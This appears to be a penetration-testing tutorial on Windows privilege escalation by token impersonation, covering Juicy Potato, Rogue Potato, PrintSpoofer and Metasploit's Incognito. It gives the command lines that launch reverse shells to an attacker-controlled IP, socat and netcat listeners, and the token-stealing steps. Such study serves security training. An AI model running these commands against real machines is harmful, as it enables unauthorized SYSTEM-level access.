Windows Privilege Escalation – Token Impersonation
Introduction
Token impersonation is a technique through which a Windows local administrator could steal another user’s security token in order to impersonate and effectively execute commands as that user.
That are certain privileges in Windows that, if enabled, could lead to an attacker escalating privileges to SYSTEM, through various tools that have been designed to specifically exploit this vulnerability.
Windows Privileges & Access Tokens
Privileges in Windows are attributes assigned to local users that allow them to perform certain actions such as shutting down the system, managing volumes, system locale settings etc.
An access token is an object that contains the security identity of a process in Windows and it is used to make security decisions. Process or thread spawned by a user will inherit the same token, which is then used when trying to interact with objects that have security descriptors (securable objects).
When a process needs to perform an operation that requires higher privileges, it can use something called impersonation, that can allow it to use another user’s tokens. Service accounts are often configured with impersonation privileges as they may need to verify that the user who is attempting to connect has the required privileges.
Exploitable Privileges
Certain privileges can be exploited to either escalate privileges directly to SYSTEM or to perform actions that are normally restricted. The privileges listed below can grant direct admin access when exploited:
| Privilege | Impact | Tool |
|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd party tool |
| SeImpersonate | Admin | 3rd party tool |
| SeBackupPrivilege | Admin | 3rd party tool |
| SeBackup | Threat | Built-in commands |
| SeCreateToken | Admin | 3rd party tool |
| SeDebug | Admin | PowerShell |
| SeLoadDriver | Admin | 3rd party tool |
| SeRestore | Admin | PowerShell |
| SeTakeOwnership | Admin | Built-in commands |
| SeTcb | Admin | 3rd party tool |
The full list of exploitable privileges is available at this link.
Juicy Potato
Juicy Potato is a fork and more popular version of the older RottenPotatoNG tool which leverages the way Windows handles access tokens, specifically SeImpersonate and SeAssignPrimaryToken. The attack works as follows:
- It trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint that can be controlled by an attacker.
- It uses Man-in-the-middle during this authentication attempt through an NTLM relay to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through Windows API calls.
- It impersonates the token that was negotiated through the privileges mentioned above
Rotten Potato relied on the BITS service having the MiTM listener on port 6666, although it was discovered that in certain scenarios BITS was intentionally disabled and port 6666 was taken. Additionally, it was found that BITS was not the only way to abuse token impersonation.
The Attack
The latest Juicy Potato binaries can be found here (for x64 bit) and here (for x32 bit). The following flags should be provided when executing the binary:
| Flag | Description |
| -t | Createprocess call: CreateProcessWithTokenW, CreateProcessAsUser, <*> try both |
| -p | Executable to launch when the exploit succeds |
| -l | COM server port to listen on |
| -c | CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097}) |
The CLSID is a serial number that represents a unique ID for any application component in Windows. This may need to be changed if the default one does not work. A full list is available here.
Example
After gaining initial initial access, the first step will be to check whether the current user has the right permission to escalate privileges.
The command below can be used in windows to check current privileges:
whoami /priv
Once verified the right privileges are enabled, a malicious binary which will be executed when the exploit runs must be generated:
It can then be transferred to the victim Windows machine:
The next step is to download and transfer the Juicy Potato binary:
Setting up a Netcat listener to wait for the connection:
Executing the Juicy Potato binary with shell.exe as the command to execute:
Rogue Potato
Rogue Potato is the latest iteration of the *Potato windows local privilege exploitation tools, which has improved this vector even further.
It can be exploited by doing the following:
- Copy a reverse shell and the RoguePotato.exe exploit to the victim.
- Set up a socat listener on port 135, to forward connections to port 9999: socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
- Start a Netcat listener on Kali.
- Execute the RoguePotato exploit to trigger the reverse shell: C:\RoguePotato.exe -r X.X.X.X –l 9999 -e “C:\shell.exe”
PrintSpoofer Exploit
The PrintSpoofer exploit can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.
It was created from something called Printer Bug, which was introduced as a tool called SpoolSample by Lee Christensen (a.k.a. @tifkin_). Its purpose is to “coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface”. The idea behind it is to provide an effective mechanism for exploiting Active Directory environments, by tricking a Domain Controller into connecting back to a system configured with unconstrained delegation.
The only prerequisite of PrintSpoofer is SeImpersonatePrivilege. It works on Windows 8.1, Windows Server 2012 R2, Windows 10 and Windows Server 2019.
- Copy a reverse shell and the PrintSpoofer.exe exploit to the victim.
- Start a Netcat listener on Kali.
- Execute the RoguePotato exploit to trigger the reverse shell: C:\PrintSpoofer.exe –i -c “C:\shell.exe”
Example:
Metasploit Expoitation
Upon checking privileges with the “whoami /priv” command, it appears the current user has the SeImpersonate privilege:
Metasploit has a handy module that can be used to exploit it. Loading the “Incognito” extension, which allows to impersonate tokens:
Using the “list_tokens -g” command to list the available tokens:
Using the “impersonate_token” command to steal the Administrator’s token:
This has granted SYSTEM level privileges to the system.
Conclusion
Token Impersonation is a major Windows privilege escalation vector and it should always be checked when performing enumeration steps, as if certain privileges are enabled, they almost guarantee SYSTEM access.
This types of vulnerabilities demonstrate how certain feature built to make life easier end up becoming huge security issues that are really hard to fix.
